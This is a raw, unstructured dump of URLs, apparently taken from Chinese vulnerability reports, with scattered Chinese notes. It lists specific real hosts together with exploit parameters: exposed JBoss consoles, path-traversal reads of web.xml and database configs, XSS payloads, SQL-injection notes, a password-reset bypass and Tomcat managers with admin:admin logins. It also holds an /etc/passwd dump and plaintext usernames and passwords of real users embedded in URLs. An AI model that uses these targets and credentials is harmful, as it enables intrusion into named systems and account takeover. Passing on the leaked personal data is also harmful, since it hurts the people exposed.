http://www.cpfgw.com/searchbargain.aspx?bacqr=111&sfzh=111&bahth=111111 http://121.15.254.25/default.asp http://210.21.119.232:8080/Services/Settings/Settings.asmx/SaveAccountPassword http://119.145.135.183:8100/dzjxkh/loginform.action http://vip.ufida.com.cn/ssbu/SiteServer/login.aspx https://www.tongbupan.com/departs/members/list/?departid=5338629&page=1&numsperpage=30 https://www.tongbupan.com/contact/showdetail/?tabletype=group&email=test@domain.com http://61.151.247.130:8080 http://passport.766.com/login?service=http://www.766.com/?ticket=ST-6996-Edzj7XailWYezvZq1OeS-authentication&ticket=ST-7128-bNZ0rYza3n0LlSbF9AUV-authentication http://www.gzsjsjc.com/mainpage/home/OperPage.aspx?goURL=ZZGL/ZZGL_List.aspx?tp=1&CDID3=3&WEBMID=2&smid=2 http://122.227.225.98:8888/bill/bill_q.aspx http://61.174.22.102//bill/bill_q.aspx http://www.portever.com:10088/bill/bill_q.aspx http://kaseshanghai.com/bill/bill_q.aspx http://180.168.61.98:10088/bill/bill_q.aspx http://wangpan.baidu.com/wap/link?shareid=3085359792&uk=2772822685&third=1&dir=%2FK8%E7%B3%BB%E7%BB%9F&page=1& http://www.gdlawyer.gov.cn:92/ http://www.gdlawyer.gov.cn:92/flow?action=open&flowType=approvein&busyType=outer&&openType=outter&dataId=0000000000122100 http://www.apply.shu.edu.cn/sys/web/Notice http://c.ahedu.net/pages/common/Login.aspx ID:223726 ID:223727 http://bbs.shiwan.com/pub/ajax_members_list?page=1&pub_id=30 http://www.htccamp.cn/ewebeditor/admin/login.aspx http://www.htccamp.cn/ewebeditor/uploadfile/admin.aspx http://vip.ufida.com.cn/nccsm/HomePage.aspx http://i.chaoxing.com/ http://glxy.nwpu.edu.cn/mba/search?keyword=%E6%90%9C%E7%B4%A2 http://glxy.nwpu.edu.cn/mba/search?keyword=%E6%90%9C%E7%B4%A2 http://www.xueersi.com/user/editPwd/type:1/id:142774/code:7110c762d61a1c86b3155ff34d46cdb7。直接访问这个链接就可以跳转到填写新密码的地方。此处id可以遍历。code参数后面的参数随便写即可。然后会提示错误,通过google浏览器的元素审查功能,吧输入密码框的代码替换掉即可,然后点击提交就可以重置你刚才设置的密码: http://shop.lakala.com:8081/ http://admin.lakalaec.com/ http://221.214.92.88:5555/GED-0.5/ http://tools.2345.com/m/yulu/search.php?page=2&w=test* http://www.capub.cn:8888/ http://221.131.71.82/ http://css.lenovo.com//usesub.php http://css.lenovo.com/test/test.php http://css.lenovo.com/test.php http://admin.yingyu.com/Admin/Public/login.html http://221.214.5.70:8080/applicationAction.do?method=enterMain http://221.214.5.70:8080/invoker/JMXInvokerServlet http://bitqcby.bitnp.net/ http://bitqcby.bitnp.net/phpmyadmin http://bitqcby.bitnp.net/wp-admin/ http://coope.9588.com/hotel/hotel/brandhtml?CityCode=CGQ&random=10000 http://android.diy.moxiu.com/ http://android.diy.moxiu.com/proxy.php?url=图片路径 http://www.wooyun.org/bugs/wooyun-2015-0109119/trace/7957093bde0d5cfb655ac9166e3aa1c3 http://www.rhxwl.com/Server.asp http://www.sxpjgtmyjj.com/shop_index.asp?no=11 http://jh.zjmy.net/shop_index.asp?no=45 http://www.hyqmyjj.com/shop_index.asp?no=51 http://www.linhaihome.com/shop_index.asp?no=63 http://www.yhmyjj.com/shop_index.asp?no=21 http://www.sxjhjj.com/shop_index.asp?no=55 http://jh.zjmy.net/shop_index.asp?no=11 http://www.sxkfqjj.com/shop_index.asp?no=32 http://www.xsunion.com/shop_index.asp?no=35 http://www.lqmyjj.com/shop_index.asp?no=46 http://www.linhaihome.com/shop_index.asp?no=34 http://www.ttmyjj.com/shop_index.asp?no=42 http://www.sxjhjj.com/shop_index.asp?no=24 http://www.wlmyjj.com/wlmyjj/shop_index.asp?no=63 http://www.hyqmyjj.com/shop_index.asp?no=11 http://jh.zjmy.net/shop_index.asp?no=45的: http://www.sxpjgtmyjj.com/shop_index.asp?no=11的: http://www.hyqmyjj.com/shop_index.asp?no=51的: http://xjz.zjol.com.cn/xye/tlbb_login.aspx存在POST注入 http://luqiao.zjol.com.cn/user/login.aspx存在POST注入 http://luqiao.zjol.com.cn/user/index.aspx存在POST注入 http://luqiao.zjol.com.cn/user/login.aspx http://luqiao.zjol.com.cn/user/index.aspx http://www.sh10000.com.cn/sh10000.rar https://github.com/colincheng1016/LAUBE/blob/0eea31e20594ab42a561c46c49106b9a57550a8b/WebRoot/WEB-INF/eccom/config/mail.properties http://www.xzhouse.com.cn/news_con.aspx?id=16492 http://erp.zto.cn/hrss/ELTextFile.load.d?src=../../ierp/bin/prop.xml jdbc:oracle:thin:@192.168.0.127:1521:erpdb http://nc.zto.cn/hrss/ELTextFile.load.d?src=../../ierp/bin/prop.xml jdbc:oracle:thin:@192.168.0.127:1521:erpdb http://221.226.179.183:8080/ http://183.136.195.142/yyprojectaudit/login.action http://mintrust.minmetals.com.cn/wkxtweb/logincheck http://oa.wnq.com.cn/yyoa/ext/trafaxserver/SystemManage/config.jsp http://219.146.174.89/yyoa/assess/js/initDataAssess.jsp view-source:http://www.ssepec.net/yyoa/common/SelectPerson/reloadData.jsp http://oa.duowei.net.cn/yyoa/ext/trafaxserver/SystemManage/config.jsp http://oa.wnq.com.cn/yyoa/ext/trafaxserver/SystemManage/config.jsp http://brightoa.com/yyoa/ext/trafaxserver/SystemManage/config.jsp http://www.saptcom.net/yyoa/ext/trafaxserver/SystemManage/config.jsp http://oa.lzmc.edu.cn/yyoa/ext/trafaxserver/SystemManage/config.jsp http://220.175.15.105:8080/jxDangerousChemicalsMgt/ http://220.175.15.105:8080/invoker/JMXInvokerServlet http://220.175.15.105:8080/myname/index.jsp http://222.134.130.228:8080/oa/ http://222.134.130.228:8080/dx_baoxian/ http://222.134.130.228:8080/yxgl/ http://222.134.130.228:8080/admin-console http://www.lntu.edu.cn/post_detail1.asp?id=xxx http://bbs.shiwan.com//bin/ajax_get_subject_list.php?order_by=1&&tag_id=0&page=1&pub_id=48 http://www.rhxwl.com/Server.asp http://jh.zjmy.net/index.asp?lhlx=%BD%F0%BB%AA http://www.sxpjgtmyjj.com/index.asp?lhlx=%C5%DB%BD%AD http://www.linhaihome.com/index.asp?lhlx=%C1%D9%BA%A3 http://www.hyqmyjj.com/index.asp?lhlx=%BB%C6%D1%D2 http://www.yhmyjj.com/index.asp?lhlx=%D3%F1%BB%B7 http://www.sxjhjj.com/index.asp?lhlx=%BE%B5%BA%FE http://jh.zjmy.net/index.asp?lhlx=%BD%F0%BB%AA http://www.sxkfqjj.com/index.asp?lhlx=%C9%DC%D0%CB%BF%AA%B7%A2%C7%F8 http://www.xsunion.com/index.asp?lhlx=%CF%F4%C9%BD http://www.lqmyjj.com//index.asp?lhlx=%BB%C6%D1%D2 http://www.linhaihome.com/index.asp?lhlx=%C1%D9%BA%A3 http://www.ttmyjj.com/index.asp?lhlx=%C1%D9%BA%A3 http://www.sxjhjj.com/index.asp?lhlx=%C1%D9%BA%A3 http://www.wlmyjj.com/wlmyjj/index.asp?lhlx=%CE%C2%C1%EB http://www.hyqmyjj.com/index.asp?lhlx=%BB%C6%D1%D2 http://jh.zjmy.net/index.asp?lhlx=%BD%F0%BB%AA的: http://www.sxpjgtmyjj.com/index.asp?lhlx=%C5%DB%BD%AD的: http://www.linhaihome.com/index.asp?lhlx=%C1%D9%BA%A3的: http://222.143.26.105:8080/HaSaltMis/ http://222.143.26.105:8080/jmx-consoles/ http://222.66.170.182:8080/main/login.jsp http://222.66.170.182:8080/jmx-console/ http://qqc.yangchongren.com//install/install.php http://wallpaper-sogou.open.moxiu.net/json.php?do=Album.Show&id=20159 http://my.gfan.com http://www.jsychrss.gov.cn https://jf.ffan.com/ http://www.ahetyy.com/config.php cn:3306 inurl:zpsys post:ZJHM http://zhaopin.wmu.edu.cn/zpsys/zssc/deletePhoto.jsp?SCLJ=1 http://zhaopin.wmu.edu.cn/zpsys/resume/resumeinfo.jsp?txsm=%E4%BB%8E%E9%AB%98%E4%B8%AD%E5%A1%AB%E5%86%99%E8%B5%B7&IsreadOnly=no http://www.appstar.com.cn/ http://www.appstar.com.cn/store/6791.htm?share_uid=2015042006636 http://www.xueersi.com/user/editPwd/type:1/id:142767/code:d31b01946f009f718948a854d14254cb code:d31b01946f009f718948a854d14254cb code:1c574569a925f741bf280481900127b4 code:7110c762d61a1c86b3155ff34d46cdb7 http://220.191.230.219:8080/rkk/pop.html http://220.191.230.219:8080/DonGz/ http://220.175.15.105:8080/jiangxiETL/ http://220.175.15.105:8080/jiangxiETL/accessory.do?method=showImage&path=E:\jboss-4.2.2.GA\server\default\.\deploy\jiangxiETL.war\userImage\admin.jpg http://220.175.15.105:8080/jiangxiETL/accessory.do?method=showImage&path=E:\jboss-4.2.2.GA\server\default\.\deploy\jiangxiETL.war\WEB-INF\web.xml http://cai.myfund.com/UserCenter/platform/PerCenter.aspx?UserName=15110677515 http://zone.wooyun.org/content/15953 http://cai.myfund.com/UserCenter/platform/PerCenter.aspx?UserName=15110677515 http://m.myfund.com/lshb.aspx?code=000008 http://zone.wooyun.org/content/15953 http://www.minshengec.com/ http://118.145.13.124/ http://baa.bitauto.com/drive/admin/ http://int.ems.com.cn/ http://value.17wo.cn/resource/value17wo/LoginForm.action http://value.17wo.cn/Form/css/xx.jsp http://value.17wo.cn/Form/css/xx.jsp http://www.dlpu.edu.cn http://masini.chuchujie.com/shareret.php?nid=600 http://www.10futu.com http://www.taiwantaxi.com.tw/taiwantaxi.zip http://vote.zj.com/vote.cgi?option=results&topic=3543 http://www.xdyg.com.cn/manage/Admin_Chk.asp http://www.xdyg.com.cn/manage/ http://blog.zzedu.net.cn/WebResource.axd?d=1429096122 http://iclass.zzedu.net.cn/space.jsp?uid=28127 http://blog.zzedu.net.cn/admin.aspx http://xy.zzedu.net.cn http://xxws.zzedu.net.cn http://218.28.2.97 http://218.28.2.99 http://218.28.2.96 http://ls.zzedu.net.cn http://mbjy.zzedu.net.cn http://www.zzstxx.com http://zzstxx.com http://news.zzedu.net.cn http://ztc.zzedu.net.cn http://bjz.zzedu.net.cn http://expo.zzedu.net.cn http://www.zzedu.net.cn www.zzedu.net.cn】 http://www.zzjy.gov.cn www.zzjy.gov.cn】 http://xsgl.zzedu.net.cn http://www.zetv.com.cn http://xwjy.zzedu.net.cn http://yywz.zzedu.net.cn http://yjzx.zzedu.net.cn http://zzjydd.zzjy.gov.cn http://jys.zzedu.net.cn http://zizhu.zzedu.net.cn http://zdj.zzedu.net.cn http://jks.zzedu.net.cn http://wgzj.zzedu.net.cn http://jdsd.zzedu.net.cn http://ggw.zzedu.net.cn http://school.zzedu.net.cn http://qjb.zzedu.net.cn http://jlxh.zzedu.net.cn http://kgw.zzedu.net.cn http://study.zzedu.net.cn http://kszx.zzedu.net.cn http://gzztc.zzedu.net.cn http://xly.zzedu.net.cn http://tyj.zzedu.net.cn http://xxzx.zzedu.net.cn http://zydj.zzedu.net.cn http://mail.zzedu.net.cn http://zz47.com http://zz47z.zzedu.net.cn http://www.zz47.com http://hhzx.zzedu.net.cn http://218.28.2.111 http://www.etfjijin.com/etfjijin.com.rar http://www.hewuyuan.com/web.rar http://www.hewuyuan.com/Manage_JobAdd.asp http://www.hewuyuan.com/Manage_JobAdd.asp http://www.hewuyuan.com/new.asp?id=1 Url:http://m.fruitday.com/login http://m.fruitday.com http://s.wanda.cn/ http://www.10futu.com/.svn/entries http://pro.jushanghui.com/ http://pro.jushanghui.com http://www.cwan.com/zt/ktpd_hd/vote.php http://www.haitiansoft.com:8080/ http://180.166.7.94/ckeditor/tupianadd.asp http://www.shhjwl.com/vos/ckeditor/tupianadd.asp http://www.shcz.net/VOS/ckeditor/tupianadd.asp http://dfoa.shhjwl.com/ckeditor/tupianadd.asp http://www.cnshuiyu.com/ckeditor/tupianadd.asp http://www.m6go.com/my/Baby.do http://www.jsmedia.cn/About/About_2.html http://passport.jsmedia.cn/User_GetPassword.asp?Reg_Site=2&ComeUrl=http%3A%2F%2Fwww%2Eczfcw%2Ecom%2F&GotoUrl= http://z.yirendai.com/sell http://gcuser_2810804.cn.gongchang.com/ http://ops.ikang.com/cgi-bin/test-cgi http://www.myfund.com/simu/fitem.aspx?code=* URL:http://www.myfund.com/fundselect/jijinjingli.aspx?managerid=* http://www.scqsm.org.cn/bbs/index.asp http://mail.scqsm.org.cn和mail.cqsm.org.cn,存在账号密码相同的弱口令,登录内部邮件服务器 http://218.85.72.90:8080/irpt/i/oem/wsb/index.jsp http://share.erya100.com http://i.mooc.chaoxing.com/settings/info http://mail.3wcoffee.com/ http://share.erya100.com http://i.mooc.chaoxing.com/settings/info http://123.138.182.14/console/loginExit/loginExit_DG3!login.action http://218.106.246.156:8080/admin/login.web http://hd.ifeng.com:8082/cgi-bin/test-cgi www.37.com,然后可以看到登陆的地方是没有验证码限制的 http://59.50.114.19/home.action http://mail.yongyou.com/wapmail/index.action http://game.tom.com/pay/.svn/entries http://122.91.252.110/usercfg/user_exitLogin.do http://122.91.252.110/usercfg/user_exitLogin.do http://59.79.251.1/jdbysj/stu_main.asp http://210.51.46.173/auth/login http://szc.fruitday.com/doc/page/main.asp http://121.31.60.232:8080/BSS/recaptcha.action?operNo=12345678901&random=1429081636365 http://www.yundaex.us/ www.yundaex.us/member/zhekouma.aspx?m=12 www.yundaex.us/Member/GuanShuiList.aspx?m=17 http://mooc.chaoxing.com/erya http://mooc.chaoxing.com/erya/error http://ptr.chaoxing.com/coursecontroller/factors?newCourse=true http://**.**.**/index.php/Transtion/showpthuzhao/Id/*****_ http://**.**.**/index.php/Transtion/showpthuzhaofan/Id/*****_ http://**.**.**/_ http://**.**.**/admin/_ http://www.xtuan.com/.svn/entries http://www.tijiangz.com/showsuit.php?hos_id=1 http://**.**.**/wsfw/wscgs/(此为跳转页面非注入页面)_ http://**.**.**/cgs/jsp/main/news.jspnewsId=20111228193954921&cgsId=8aea92bd3474119c01347447f21200cd_ http://buy.gongchang.com/ http://219.131.221.59:8080/ http://219.131.221.59:8080/jmx-console http://skypearl.csair.com/ http://www.hn165.com/mobapps/detail/appid/23 http://www.mldwedu.cn/ IP:60.31.190.148 http://localhost/www/admin.php?m=package&f=obtain http://localhost/www/admin.php?m=package&f=install&package=hellochanzhi&downLink=aHR0cDovL3d3dy5jaGFuemhpLm9yZy9leHRlbnNpb24tYnV5RXh0LTEtZG93bmxvYWQuaHRtbA==&md5=093632e563a4911d6f26d3c876aaf4dc&type=extension&overridePackage=no&ignoreCompatible=yes&overrideFile=no&agreeLicense=yes&upgrade=no http://www.chanzhi.org/extension-buyExt-1-download.html http://localhost/www/admin.php?m=package&f=install&package=aaa&downLink=aHR0cDovL2xvY2FsaG9zdC9zYi56aXA=&md5=&type=extension&overridePackage=no&ignoreCompatible=yes&overrideFile=no&agreeLicense=yes&upgrade=no http://localhost/sb.zip http://121.41.119.34:8080/weiconsole/login.action http://www.coremail.cn/gjzc2/list_117.aspx?lcid=412 inurl:fund.eastmoney.com/?pwd、 http://fund.eastmoney.com/?uname=331081198708159423&pwd=Sqq@2014 http://fund.eastmoney.com/?uname=15098811062&pwd=714098amanda http://fund.eastmoney.com/?uname=13952799848&pwd=20080113 http://fund.eastmoney.com/?uname=13309145111&pwd=13309145111 http://fund.eastmoney.com/?uname=18505088830&pwd=bbdwd1204 http://fund.eastmoney.com/?uname=15605318651&pwd=laji568184 http://fund.eastmoney.com/?uname=15207332668&pwd=xubing0604 http://fund.eastmoney.com/?uname=13599916102&pwd=605471172seantim http://fund.eastmoney.com/?uname=15731219922&pwd=vv5201314 http://219.153.125.65:8080/oa/login/login/loginOff.action http://219.153.125.65:8080/oa/login/login/loginOff.action jboss-4.2.2.GA/server/default/./deploy/oa.war jboss-4.2.2.GA/bin jboss-4.2.2.GA/bin/run.jar http://219.153.125.65:8080/oa/login/login/loginOff.action jboss-4.2.2.GA/server/default/./deploy/oa.war/ http://rd.baosteel.com/ProjectMM/check.weizh http://61.152.151.203:8001/manager/html root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/dev/null daemon:x:2:2:daemon:/sbin:/dev/null adm:x:3:4:adm:/var/adm:/dev/null lp:x:4:7:lp:/var/spool/lpd:/dev/null sync:x:5:0:sync:/sbin:/dev/null shutdown:x:6:0:shutdown:/sbin:/dev/null halt:x:7:0:halt:/sbin:/dev/null mail:x:8:12:mail:/var/spool/mail:/dev/null uucp:x:10:14:uucp:/var/spool/uucp:/dev/null operator:x:11:0:operator:/root:/dev/null games:x:12:100:games:/usr/games:/dev/null gopher:x:13:30:gopher:/var/gopher:/dev/null ftp:x:14:50:FTP User:/var/ftp:/dev/null nobody:x:99:99:Nobody:/:/dev/null dbus:x:81:81:System bus:/:/dev/null vcsa:x:69:69:virtual owner:/dev:/dev/null rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/dev/null abrt:x:173:173::/etc/abrt:/dev/null rpcuser:x:29:29:RPC User:/var/lib/nfs:/dev/null nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/dev/null haldaemon:x:68:68:HAL daemon:/:/dev/null ntp:x:38:38::/etc/ntp:/dev/null saslauth:x:499:76:"Saslauthd saslauth:/dev/null postfix:x:89:89::/var/spool/postfix:/dev/null sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/dev/null tcpdump:x:72:72::/:/dev/null oprofile:x:16:16:Special OProfile:/home/oprofile:/dev/null admin:x:0:0::/home/admin:/bin/bash useradmin:x:500:10::/home/useradmin:/bin/bash imcc:x:501:501::/home/imcc:/bin/bash http://mirror.qyer.com/shell/ http://mirror.qyer.com/conf/ http://219.131.221.59:8080/ http://219.131.221.59:8080/download.fe?filePath=/WEB-INF/web.xml http://219.153.125.65:8080/oa/index.html http://219.153.125.65:8080/oa/fileUpload/fileUploadDemo/download.action?filePath=/usr/jboss-4.2.2.GA/server/default/./deploy/oa.war/WEB-INF/web.xml&fileName=web.xml http://219.153.125.65:8080/oa/fileUpload/fileUploadDemo/removeFile.action?filePath=/usr/jboss-4.2.2.GA/server/default/./deploy/oa.war/js/editorjs/attached/20150421232925677_326.jsp inurl:http://chaxun.neea.edu.cn/examcenter/recerti.cn?op=doApp&loginName= http://chaxun.neea.edu.cn/examcenter/recerti.cn?op=doApp&loginName=chaorentw@qq.com&pwd=chaoren http://chaxun.neea.edu.cn/examcenter/scoreprint.cn?op=doLoginSystem&login_system_type=cet http://chaxun.neea.edu.cn/examcenter/recerti.cn?op=doApp&loginName=chuanzimo@126.com&pwd=chew,4you www.shxme.com http://shxme.com/api/php.php http://www.yaofang.cn/a/user/findPwd inurl:http://fanxing.kugou.com/username http://fanxing.kugou.com/1042179?username=lvbolong&password=scope123&sm=&login_btn= http://fanxing.kugou.com/?username=%E5%94%AF%E4%B8%80deWT&password=123456&sm= http://fanxing.kugou.com/1013217?userName=%E6%AE%87%E9%9B%A80123&password=1192675775&repassword=1192675775&code=TIPOM®_btn= http://fanxing.kugou.com/?username=唯一deWT&password=123456&sm= https://github.com/haryzhou/zeta/blob/2c4b4aa7cd16d8e4745e8cf1de9d17ccf1c95a5a/lib/Zeta/Mailer/Simple.pm http://202.194.176.30:8080/index.action http://oa.gd.sina.com.cn/login/check_login http://diy.hicdma.com/index.jsp inurl:http://passport.secoo.com/findPassword/findpass3.jsp?userName= http://passport.secoo.com/findPassword/findpass3.jsp?userName=13352522789&sign=64629973412A8DA41C6AA3FBAF2E76BF http://passport.secoo.com/findPassword/findpass3.jsp?userName=18611832868&sign=7C4E692A6F8A663B372002DA635DE7EA http://bxzd.bj12345.gov.cn:8080/bsic_internet/publicQuestionMgt_publicQuestionMgt.action http://crpe.ruc.edu.cn/CN/article/searchArticle.do http://123.232.113.241/bcis/Login.aspx http://123.232.113.241/bcis/Login.aspx http://www.myuios.com/.git/config http://test.myuios.com/phpinfo.php http://116.213.142.202/medicalManager/ http://116.213.142.202/medicalManager/news/adminCheck.jsp http://116.213.142.202/medicalManager/js/news/adminCheck.js http://www.skywldh.com/reg/reg.html inurl:http://www.hotelgg.com/member/getpassword?code= http://www.hotelgg.com/member/getpassword?code=41a989327fcbb1ff6SEXOmuM9cNSIyu4ISsFeE0cjOhcvXnULLTE6A5DxnXZPYpFIjBnVYQfuwoEDu9bBm60Fwk&email=298168099@qq.com http://www.hotelgg.com/member/getpassword?code=010af237e4f1370fWfdT47UpFMiLGsdWC6k%2FPt0p4FNwftajvhXrQM%2BWumS%2BNz2r%2FsQAr2JCIeLfCWSGxTDGTHk&email=644328887@qq.com http://www.hotelgg.com/member/getpassword?code=e185a6271158e68bO5RdIywh%2B7GMZTRwSVxXSyqqWb%2FopwiNILlMtuqo8Elb0xJGDL5hfq%2Fkp5EBzH5MUKujPMzi&email=daihuan@cnhnb.com http://www.hotelgg.com/member/getpassword?code=e185a6271158e68bO5RdIywh%2B7GMZTRwSVxXSyqqWb%2FopwiNILlMtuqo8Elb0xJGDL5hfq%2Fkp5EBzH5MUKujPMzi&email=daihuan@cnhnb.com http://www.hotelgg.com/member/getpassword?code=010af237e4f1370fWfdT47UpFMiLGsdWC6k%2FPt0p4FNwftajvhXrQM%2BWumS%2BNz2r%2FsQAr2JCIeLfCWSGxTDGTHk&email=%3Cscript%3Ealert%28%22%22%29%3C/script%3E%3C http://www.hotelgg.com/member/getpassword?code=010af237e4f1370fWfdT47UpFMiLGsdWC6k%2FPt0p4FNwftajvhXrQM%2BWumS%2BNz2r%2FsQAr2JCIeLfCWSGxTDGTHk&email= http://www.keepc.com/reg/reg.html http://acm.sdut.edu.cn/sdutoj/compile.php?solutionid=184746 http://s.chinapaid.net/forgetpassword.action http://www.bhedu.com.cn:8041/ http://120.197.24.136:8080/verify/login http://acm.sdut.edu.cn/sdutoj/setting.php?userid=17737 http://bbs.chexun.com/3g/view.php?tid=702562 http://mall.grcbank.com/TopMallWeb/newpage/login/login.jsp?returnURL=%22%3E%3C/script%3E%3Ciframe/onload=alert%281%29%3E http://mall.grcbank.com/TopMallWeb/clientAction!mentionAddress.action?oper=custAddInfo http://mall.grcbank.com http://archives.shsmu.edu.cn:7001/jdyxyinfoplat/WebRoot/platformData/infoplat/pub/jdyxy_2522/xyrw/jdyxy_fifth_more_new1.jsp?id=58 http://fans.hisense.com/default.php inurl:ecdomain http://www.cl.yn.gov.cn/topic.aspx?tid=4 http://www.phpyun.com/主站存在nginx解析漏洞,通过主站下的论坛头像上传功能,可直接上传图片马获取主站系统控制权限,并可获得论坛近两万用户的信息。 http://210.75.20.140:5001/anyeye/ http://210.75.20.140:5001/jmx-console http://210.75.20.140:5001/web-console http://210.75.20.140:5001/invoker/JMXInvokerServlet http://tj.fruitday.com/ http://mail.pipi.cn/ http://oa.ccoopg.com/ http://218.202.254.215:8080/jybz/login.action http://218.202.254.215:8080/admin-console http://www.06330633.net/ http://hotels.yonyou.com/ajax_action/get_chain?chainid=115&cityid=0101 http://xm.597.com/Recruit/chqycx.aspx?nid=VR150330115534 http://**.**.**/bill/js/test.gbk.jsp http://www.mvmmall.cn/down.html http://localhost/free/ajax.php?action=readmsg&uid=2&_=1429680053436 http://oms.fruitday.com/users/login www.casio.com.cn http://wo.gx10010.com/index.html http://www.jushanghui.com/ http://www.wooyun.org/corps/海尔集团 http://hotels.yonyou.com/hotelmaplist/index.html?cityid=0101&h=340&ids=17996,129696,21117,26147,126559,124890,103431,17994,146306,146302,128908,145772,146286,146180,17995&juli=&px=3&w=760 http://202.96.11.45 http://202.96.11.45/jmx-console/ http://202.96.11.45/DonGz/index.jsp http://202.96.11.48/SmartLearning/ http://202.96.11.46/KinmetFutures/login.jsp http://video2.duxiu.com/recommendlist.asp?pg=1 http://project.rong360.com/twiki/bin/view/Main/WebHome。 http://review.ttpod.com/.git/config com:ttpod/review-ttpod-com.git http://pim.hn165.com http://pim.hn165.com/admin/ http://www.sctv.com http://lvyou.baidu.com/notes/705006f538fa0fd1185fb63a?pos=5### http://gjzx.cumt.edu.cn:8080/SoMooc/viewSpace.action?userid_visited=5b5ba3f74a4b8dd2014a5246d0b70016 http://mail1.citic.com/admin/ eyouuser:eyou_admin http://ydlb.gwng.edu.cn:8080/SoMooc/viewSpace.action?userid_visited=297edff84c69d78c014c78efad4a003c http://fangvip.ganji.com/hr_v2/?c=Auth&a=login http://218.104.169.74:8080/Lams/ http://114.255.63.24/admin/login.html http://www.jxvw.com/ http://xb.imnu.edu.cn/manage/node_article_add2.asp?menu=addnewss&qikan_id=237&node_id=1 http://www.hzng.cn/dzb/manage/node_article_add2.asp?menu=addnewss&qikan_id=20&node_id=1 http://epaper.jxut.edu.cn/manage/node_article_add2.asp?menu=addnewss&qikan_id=280&node_id=1 http://www.sxgjdl.com:8181//manage/node_article_add2.asp?menu=addnewss&qikan_id=250&node_id=1 http://cy.jxstnu.cn/new/jxkjsf/manage/node_article_add2.asp?menu=addnewss&qikan_id=350&node_id=1 http://www.viewgood.cn/channels/4.html http://wlsp.zzuli.edu.cn/viewgood/webmedia/portal/query_user_password_qustion.aspx?user_name=1 http://zhibo.jsedu.sh.cn/viewgood/webmedia/portal/query_user_password_qustion.aspx?user_name=1 http://media.maslib.com.cn:81/viewgood/webmedia/portal/query_user_password_qustion.aspx?user_name=1 http://14.23.108.4:81/viewgood/webmedia/portal/query_user_password_qustion.aspx?user_name=1 http://vod.xmedu.cn/viewgood/webmedia/portal/query_user_password_qustion.aspx?user_name=1 http://pms.suning.com.cn/ http://pms.suning.com.cn/zentao/extension-browse.html http://125.35.6.121/upload/index.jsp发现是个马,但是没密码咋整? http://222.185.229.85/index.php https://ssl.hisense.com/+CSCOE+/portal.html http://drops.wooyun.org/papers/3451 http://oos.yundasys.com/login.php http://jwgl.gxu.edu.cn/ http://jwgl.gxu.edu.cn/fckeditor/editor/filemanager/browser/default/browser.html?&connector=../../connectors/aspx/connector.aspx http://demo.ourphp.net http://demo.ourphp.net/?cn-shoppingcart.html-&ourphp_cms=shopping http://statistics.eloancn.com/ http://2015.cert.org.cn/index.html这里看到的会议信息,然后上面有一个注册会议。点击注册会议后跳转到了31会议网。 http://event.31huiyi.com/29647621 http://www.shcdkf.com/ http://www.shcdkf.com/cwc/KFweb/admin/StudentPassword.aspx http://weixin.cnu.edu.cn/wx/gzyy/data_service.aspx?method=Student_Reg&id=1120200002 http://user.mmbao.com/findPassword.html http://kxfz.qndj.gov.cn/invoker/JMXInvokerServlet http://jd.gd.gov.cn/invoker/JMXInvokerServlet http://jadjw.jinan-fz-fj.gov.cn/invoker/JMXInvokerServlet http://hd.221.gov.cn/invoker/JMXInvokerServlet http://jpkc.njit.edu.cn/invoker/JMXInvokerServlet http://cst.gzu.edu.cn/invoker/JMXInvokerServlet http://www.1218.com.cn/administrator.php/common/login/index.php?back=http://www.1218.com.cn/administrator.php http://rel.lenovo.com.cn/zhaoyang/admin/index.php http://rel.lenovo.com.cn/zhaoyang/admin/excel.php http://rel.lenovo.com.cn/zhaoyang/admin/excel_ios.php http://220.171.31.78:8000/hsfk/ http://220.171.31.78:8000/czcykt/ http://220.171.31.78:8000/admin-console https://122.228.153.103/exchange/login.htm?loginMemberVo.memberType=1 https://122.228.153.103/jmx-console/ http://sms.ckair.com http://122.225.117.68/zhongtian.zto,发现可以Post http://221.178.186.19 http://www.cpbao.com http://www.cpbao.com/user/fund!bindMobileOrEmail.action?userIdCard=4467239&isBindEmail=1&bindEmail=10001@qq.com url:http://218.28.26.147:8081/manager/html user:admin pass:admin http://www.gzsewing.com http://www.125309.com http://www.nm3g.org http://35dianqi.com http://www.ai04.com http://www.longmm.net http://www.99pwan.com http://www.heimawg.com http://www.hzjdpm.cn http://ptwb.net http://5lmm.cn http://www.125309.com/admin/dingdan_sendnot.asp url:http://220.162.244.35:8081/manager/html user:admin pass:admin http://icc.yeepay.com http://icc.yeepay.com/about/CVS/Root pserver:ye.tian@192.0.0.173:/home2/cvsroot index.html/1.4/Mon 3.code/YP2G_ROOT/ROOT.war/about url:http://222.35.103.226:8081/manager/html user:admin http://www.bass.gov.cn/ http://vpn.bass.gov.cn/ http://61.154.135.18:8099/PTSC/login.action http://61.154.135.18:8099/PTSC/login.action http://**.**.**/index.jsp搜索栏处存在搜索型SQL注入漏洞_ http://ub1.nslm.g.baofeng.com/ http://ub1.nslm.g.baofeng.com/test/gd.php http://222.210.17.165:80/selects.asp?Key=88888 www.21cnedu.com http://study.21cnedu.com/default.aspx http://study.21cnedu.com/cneduschool/upload/school/440304123456/homeworkinfo/087010101/201542222224671371.asp http://m.suning.com.cn:8001/install/ http://m.suning.com.cn:8001/install/InstallSysAdmin.aspx http://fws.youshang.com/sso/sendRedirect.action http://rel.lenovo.com.cn/zhaoyang/admin/index.php http://rel.lenovo.com.cn/zhaoyang/admin/ ftp://122.112.16.233 http://cht.citic/trc/www.travel.citic.com/enterprise_news_details.jsp?docid=4275 http://cht.citic/trc/www.travel.citic.com/visaDetail.jsp?visaid=1701 http://cht.citic/trc/www.travel.citic.com/shipList.jsp?shipid=1240 http://customer.cs.ecitic.com/hr/positionAction.do?url=--%3E%27%22%3E%3CH1%3EXSS%40HERE%3C%2FH1%3E&extendUrl=type%3D05&type=05&method=listPositionByPageFromIndex http://www.travel.citic.com/route_search.jsp?travelType=--%3E%27%22%3E%3CH1%3EXSS%40HERE%3C%2FH1%3E http://www.travel.citic.com/route_search.jsp?travelType=--%3E%27%22%3E%3CH1%3EXSS%40HERE%3C%2FH1%3E http://www.travel.citic.com/route_detail.jsp?routeid=--%3E%27%22%3E%3CH1%3EXSS%40HERE%3C%2FH1%3E http://www.travel.citic.com/route_search.jsp?regionId=--%3E%27%22%3E%3CH1%3EXSS%40HERE%3C%2FH1%3E 